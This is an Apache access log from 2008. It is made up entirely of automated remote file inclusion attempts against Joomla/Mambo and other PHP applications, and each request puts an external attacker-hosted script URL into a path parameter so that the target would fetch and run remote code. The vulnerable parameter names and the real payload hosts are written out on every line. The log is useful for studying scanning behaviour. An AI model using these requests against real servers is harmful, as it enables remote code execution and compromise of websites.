89.111.176.11 - - [02/May/2008:09:23:07 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.dawntown.ru/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [02/May/2008:09:23:08 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.dawntown.ru/cache/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.216.107 - - [02/May/2008:09:23:11 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:23:12 -0700] "GET /logs/access_080127.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:23:13 -0700] "GET /logs/access_080315.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:09:23:13 -0700] "GET /logs//login.php?dir=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:23:14 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.800" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:23:14 -0700] "GET /logs/access_080315.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:23:15 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:23:16 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:09:23:16 -0700] "GET /logs/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:09:23:16 -0700] "GET /plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.120.237.150 - - [02/May/2008:09:23:17 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:23:19 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:23:22 -0700] "GET /logs/access_080127.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.237.150 - - [02/May/2008:09:23:23 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [02/May/2008:09:23:24 -0700] "GET /logs/access.log/index.php?configFile=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:23:24 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:09:23:24 -0700] "GET //login.php?dir=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:09:23:24 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:23:25 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:23:25 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:09:23:25 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:09:23:26 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:23:27 -0700] "GET /logs/access_080227.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:23:27 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
216.120.237.150 - - [02/May/2008:09:23:28 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:23:29 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:23:29 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:23:31 -0700] "GET /logs/access_080227.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:23:37 -0700] "GET /logs/access_080309.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:23:42 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:23:42 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.233.12.225 - - [02/May/2008:09:23:44 -0700] "GET /logs/access_080205.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:23:51 -0700] "GET /logs/access_080127.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:09:24:00 -0700] "GET /logs/access_080219.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:09:24:04 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.237.150 - - [02/May/2008:09:24:05 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:24:06 -0700] "GET /logs/access_080324.log/skins/advanced/advanced1.php?pluginpath[0]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:24:07 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:24:07 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.19.130 - - [02/May/2008:09:24:08 -0700] "GET /logs/access_080213.log/index.php?configFile=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.233.12.225 - - [02/May/2008:09:24:15 -0700] "GET /logs/access_080205.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:24:17 -0700] "GET /logs/access_080205.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:24:47 -0700] "GET /logs/access_080220.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:24:47 -0700] "GET /logs/access_080205.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.138.144 - - [02/May/2008:09:24:48 -0700] "GET /logs/access_080218.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:09:25:03 -0700] "GET /logs/access_080312.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:09:25:04 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:09:25:04 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:25:10 -0700] "GET /logs/access_080209.log//popup_window.php?site_isp_root=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:25:11 -0700] "GET //popup_window.php?site_isp_root=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:25:11 -0700] "GET /logs//popup_window.php?site_isp_root=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:25:30 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:25:31 -0700] "GET /logs/access_080324.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:25:31 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:25:31 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:25:50 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:25:51 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.165.216.146 - - [02/May/2008:09:25:52 -0700] "GET /logs/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [02/May/2008:09:25:52 -0700] "GET /plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:25:57 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.95.186 - - [02/May/2008:09:26:01 -0700] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [02/May/2008:09:26:01 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [02/May/2008:09:26:01 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:26:03 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:09:26:09 -0700] "GET /logs/lib/gore.php?libpath=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.156.59 - - [02/May/2008:09:26:09 -0700] "GET /logs/access_080205.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:09:26:09 -0700] "GET /lib/gore.php?libpath=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:26:18 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:26:18 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:26:19 -0700] "GET /logs/access_080324.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:09:26:31 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:09:26:31 -0700] "GET /SQuery/lib/gore.php?libpath=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.172.175.130 - - [02/May/2008:09:26:33 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.toneeleww.nl//modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [02/May/2008:09:26:34 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.toneeleww.nl//modules/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
211.233.89.217 - - [02/May/2008:09:26:35 -0700] "GET /logs/access_080205.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.237.150 - - [02/May/2008:09:26:44 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [02/May/2008:09:26:44 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [02/May/2008:09:26:44 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:09:26:56 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:09:26:56 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:09:26:56 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.233.89.217 - - [02/May/2008:09:27:02 -0700] "GET /logs/access_080205.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:27:09 -0700] "GET /logs/access_080324.log/skins/advanced/advanced1.php?pluginpath[0]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:27:09 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:27:09 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:27:26 -0700] "GET /logs/access_080312.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.176.96 - - [02/May/2008:09:27:26 -0700] "GET /logs/index.php?option=com_akocomment&task=&Itemid=&mosConfig_absolute_path=http://cinta.sitesled.com/monjali/sken/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [02/May/2008:09:27:30 -0700] "GET /index.php?option=com_akocomment&task=&Itemid=&mosConfig_absolute_path=http://cinta.sitesled.com/monjali/sken/echo.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:27:43 -0700] "GET /logs/access_080219.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:27:50 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:09:27:52 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:09:27:52 -0700] "GET /logs/access_080321.log/index2.php?p=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:09:27:52 -0700] "GET /index2.php?p=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:09:27:52 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:09:27:53 -0700] "GET /logs/index2.php?p=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:09:27:53 -0700] "GET /logs/access_080223.log/index2.php?p=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:27:54 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [02/May/2008:09:27:57 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:28:00 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [02/May/2008:09:28:01 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
72.52.130.240 - - [02/May/2008:09:28:21 -0700] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:28:23 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:28:24 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:09:28:31 -0700] "GET /logs//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:09:28:35 -0700] "GET //sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
